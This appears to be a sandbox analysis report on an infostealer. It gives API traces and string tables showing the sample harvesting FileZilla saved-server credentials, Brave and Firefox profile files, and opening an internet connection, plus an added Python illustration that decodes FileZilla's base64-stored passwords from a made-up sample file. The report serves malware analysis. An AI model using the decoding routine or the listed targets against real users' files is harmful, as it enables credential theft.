                                  • Opcode Fuzzy Hash: 3b895da33a702692135a9b2a70cbfc93d917eddc8de7d966c38ede332b31d7e3
                                  • Instruction Fuzzy Hash: E962933191161AABCB23EF75CC49AEF77B9AF44700F058225F905A7291DB74EE41CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003F69C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F6A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003F6A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003F6AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003F6B35
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6B9D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: db344f340380142574fd2dea2c687980e1bf01314f0669611b43a1375f8cc99c
                                  • Instruction ID: b52e857e2fc4b0d0fe212f79cedf3732e482a45ac15e336ef48ad3eed5fd9b5f
                                  • Opcode Fuzzy Hash: db344f340380142574fd2dea2c687980e1bf01314f0669611b43a1375f8cc99c
                                  • Instruction Fuzzy Hash: 2F42C371A0021AAFCB12EBB1DC8ABAF777AAF44700F195529F905E7291DB74DD01CB60
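The strings of this function (`<Host>`, `<Port>`, `<User>`, `<Pass encoding="base64">`, the `\AppData\Roaming\FileZilla\recentservers.xml` suffix appended to the SHGetFolderPathA result, and the `browser: FileZilla` / `profile: null` / `url:` / `login:` / `password:` labels) describe what it harvests: FileZilla stores recent-connection passwords base64-encoded, not encrypted, so any process running as the user can recover them. The Python below is an added illustration, not code from the sample or from Joe Sandbox. It parses a constructed recentservers.xml in FileZilla 3's layout and decodes the password field so a defender can see exactly what is exposed; the hostnames and credentials are invented, and the label order used by `format_record` is an assumption (the report only lists the strings, not their order in the output).

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample laid out like FileZilla 3.x's recentservers.xml
# (invented hosts and credentials; "aHVudGVyMg==" is base64 for "hunter2").
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <User>backup</User>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_recent_servers(xml_text):
    """Return one dict per <Server> with the fields the sample's strings name."""
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User", default="")
        pass_el = server.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            # base64 is an encoding, not encryption: anything that can read the
            # file recovers the plaintext, which is all the stealer has to do.
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                password = pass_el.text
        entries.append({"url": f"{host}:{port}", "login": user, "password": password})
    return entries


def format_record(entry):
    """Render an entry with the labels from the string table above.
    The label order is an assumption made for this example."""
    password = entry["password"] if entry["password"] is not None else ""
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {entry['url']}",
        f"login: {entry['login']}",
        f"password: {password}",
    ])


if __name__ == "__main__":
    for entry in parse_recent_servers(SAMPLE_RECENTSERVERS):
        print(format_record(entry))
        print()
```

The CSIDL value 0x28 passed to SHGetFolderPathA is CSIDL_PROFILE, the user's profile directory, which is why the appended suffix begins at `\AppData`. Entries without a `<Pass>` element (saved without a password, or interactive logon) come back with `password` set to `None` rather than being dropped, so the record count still matches the number of servers in the file.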
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDBEF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003EDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC17
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003EDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC4C
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDC8F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003EDCD0
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003EDCF0
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003EDD0A
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003EDD1D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDD7B
                                  • lstrlen.KERNEL32(00411794), ref: 003EDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDA3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDDAF
                                  • lstrlen.KERNEL32(?), ref: 003EDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDE19
                                  • lstrlen.KERNEL32(00411794), ref: 003EDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDE6F
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDE7B
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDEBB
                                  • lstrlen.KERNEL32(00411794), ref: 003EDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDEE6
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDEF2
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFA5
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDFB1
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDFF4
                                  • lstrlen.KERNEL32(00411794), ref: 003EDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE022
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EE02E
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 003EE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 003EE0E7
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE11F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003EE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE19F
                                  • lstrcat.KERNEL32(00000000), ref: 003EE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003EE1F9
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE22F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003EE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE261
                                  • lstrcat.KERNEL32(00000000,011A8A18), ref: 003EE269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003EE988
                                  • FindClose.KERNEL32(00000000), ref: 003EE997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 7228ffd2e127cd48e1af01a80f9e36bf0b273c9fd4d3b0fb1e143b5bcd41789a
                                  • Instruction ID: bbce61b93fb2435985659027250b3a84756483982d1974ebedd77cd42e35026c
                                  • Opcode Fuzzy Hash: 7228ffd2e127cd48e1af01a80f9e36bf0b273c9fd4d3b0fb1e143b5bcd41789a
                                  • Instruction Fuzzy Hash: C752A3319102A69FCB22EF76DC89AAF77B9AF44700F055229F8059B2D1DB74DD41CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E60FF
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6152
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6185
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E61B5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E61F0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003E6233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 56a3c88bb19793ef99eb9ff552154d7643da0666a4b32956063a957977ba94d3
                                  • Instruction ID: cafaac1de82a420366864d413492b2a864ab73c928410a36cf067e1fb846c486
                                  • Opcode Fuzzy Hash: 56a3c88bb19793ef99eb9ff552154d7643da0666a4b32956063a957977ba94d3
                                  • Instruction Fuzzy Hash: 49527131D002669FCB22EBB6DC46B9F77B9AF54340F159229F805AB2D1DB74ED018B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6B9D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6BCD
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6BFD
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003F6C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003F6C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 003F6C5A
                                  • lstrlen.KERNEL32(00000000), ref: 003F6C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 003F6CE2
                                  • lstrlen.KERNEL32(00000000), ref: 003F6CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 003F6D6A
                                  • lstrlen.KERNEL32(00000000), ref: 003F6D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003F6DF2
                                  • lstrlen.KERNEL32(00000000), ref: 003F6E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003F6E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 003F6EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003F6EC9
                                  • LocalFree.KERNEL32(00000000), ref: 003F6ED4
                                  • lstrlen.KERNEL32(?), ref: 003F6F6E
                                  • lstrlen.KERNEL32(?), ref: 003F6F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: c8f7b010347ab531de8706a0213c7597d3d3119cb380779184d1110221bb324d
                                  • Instruction ID: 54baf21f729bec88ab2f417904a2e8a7a3ea58342ab35108c7a03d738b4d2cf2
                                  • Opcode Fuzzy Hash: c8f7b010347ab531de8706a0213c7597d3d3119cb380779184d1110221bb324d
                                  • Instruction Fuzzy Hash: A702B131A0021AAFCB12EBB1DC4AFAF7BBAAF04700F195525F905EB291DF74D9018760
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4B7F
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BA7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F4BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: 94d33092ea65870303472ef35734f8b1b20b8e66eb8b2284e72ec07f05e9540c
                                  • Instruction ID: 95383d5aa80b0398af12568b4a4b645e1ba621b9bce27c1255ccdfd65f64f9c4
                                  • Opcode Fuzzy Hash: 94d33092ea65870303472ef35734f8b1b20b8e66eb8b2284e72ec07f05e9540c
                                  • Instruction Fuzzy Hash: EE927330A0160A9FDB26CF29C948B6AB7F5AF44714F1AC16DE609DB3A1D771DC82CB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F12BF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12E7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F133A
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F135C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F1376
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F13E2
                                  • lstrlen.KERNEL32(00411794), ref: 003F13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F140A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1416
                                  • lstrlen.KERNEL32(?), ref: 003F1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F147A
                                  • StrCmpCA.SHLWAPI(?,011AECF0), ref: 003F14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1535
                                  • StrCmpCA.SHLWAPI(?,011AF418), ref: 003F1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F15E4
                                  • StrCmpCA.SHLWAPI(?,011AEF00), ref: 003F1602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1685
                                  • StrCmpCA.SHLWAPI(?,011AED08), ref: 003F16B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F16F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003F181C
                                  • FindClose.KERNEL32(00000000), ref: 003F182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 90b704c3a39cf66875a5121d92a32fc1a4f4b2ce87afe830f3be04c7ea219e07
                                  • Instruction ID: c0238352c96e595fe01d9705e959131be80a4a622e29f5c269fb8eb0fa575713
                                  • Opcode Fuzzy Hash: 90b704c3a39cf66875a5121d92a32fc1a4f4b2ce87afe830f3be04c7ea219e07
                                  • Instruction Fuzzy Hash: 5B12C571A0021ADBCB22EF75E899ABF77B9AF44300F054529F946D7291DF34EC458BA0
                                  APIs
